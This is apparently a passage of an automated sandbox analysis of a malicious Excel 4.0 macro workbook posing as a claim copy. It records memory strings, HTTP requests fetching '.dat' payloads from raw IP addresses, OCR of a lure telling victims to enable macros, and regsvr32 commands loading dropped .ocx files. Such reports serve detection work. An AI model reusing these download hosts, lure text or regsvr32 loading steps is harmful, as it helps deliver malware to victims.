Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: EXCEL.EXE, 00000000.00000003.957609902.00000000133B4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869052762.00000000133AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965787422.00000000133B5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812737746.00000000133AF000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devicess
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965819822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp String found in binary or memory: https://web.microsofts
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/5
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://wus2.contentsync.
Source: EXCEL.EXE, 00000000.00000003.957609902.00000000133B4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869052762.00000000133AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965787422.00000000133B5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812737746.00000000133AF000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://wus2.pagecontentsync.
Source: EXCEL.EXE, 00000000.00000002.965446907.00000000131D8000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957568679.0000000013401000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965837750.0000000013402000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://www.odwebp.svc.msOneDriveClientDownloadSitehttps://onedrive.live.com/about/download/?windows
Source: global traffic HTTP traffic detected: GET /939602286691.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.82.126.78Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /939602286691.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 158.69.133.78Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /939602286691.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.142.211.62Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /939602286691.dat2 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.142.211.62Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /939602286691.dat2 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.82.126.78Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /939602286691.dat2 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 158.69.133.78Connection: Keep-Alive

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 12 Screenshot OCR: Enable editing" in the yellow t above. example of notification 'E . ( O ~EcmwARNNG Thisfileoriqi
Source: Screenshot number: 16 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcmwARNING This fileorig
Source: Screenshot number: 16 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Screenshot number: 16 Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Found Excel 4.0 Macro with suspicious formulas
Source: ClaimCopy-539408676-12022021.xlsb Initial sample: EXEC
Found protected and hidden Excel 4.0 Macro sheet
Source: ClaimCopy-539408676-12022021.xlsb Initial sample: Sheet name: Tiposa1
Found a hidden Excel 4.0 Macro sheet
Source: ClaimCopy-539408676-12022021.xlsb Macro extractor: Sheet name: Tiposa1
Source: ClaimCopy-539408676-12022021.xlsb Macro extractor: Sheet name: Tiposa
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: ClaimCopy-539408676-12022021.xlsb Virustotal: Detection: 10%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet1.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet2.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet3.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet1.ocx Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet2.ocx Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 C:\ProgramData\Volet3.ocx Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{ED9E7A0B-B4F8-4792-AAAB-06E5A3DA53A0} - OProcSessId.dat Jump to behavior
Source: classification engine Classification label: mal76.expl.evad.winXLSB@13/6@0/3
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: ClaimCopy-539408676-12022021.xlsb Initial sample: OLE zip file path = xl/media/image1.jpg
Source: ClaimCopy-539408676-12022021.xlsb Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: 14C50000.0.dr Initial sample: OLE zip file path = xl/media/image1.jpg
Source: 14C50000.0.dr Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: EXCEL.EXE, 00000000.00000002.962199751.000000000DD72000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.963451154.000000000FAE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.963378718.000000000FAD1000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW

HIPS / PFW / Operating System Protection Evasion:

barindex
Yara detected Xls With Macro 4.0
Source: Yara match File source: app.xml, type: SAMPLE
Source: EXCEL.EXE, 00000000.00000002.960880422.0000000003330000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: EXCEL.EXE, 00000000.00000002.960880422.0000000003330000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: EXCEL.EXE, 00000000.00000002.960880422.0000000003330000.00000002.00020000.sdmp Binary or memory string: Progman
Source: EXCEL.EXE, 00000000.00000002.960880422.0000000003330000.00000002.00020000.sdmp Binary or memory string: Progmanlock
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs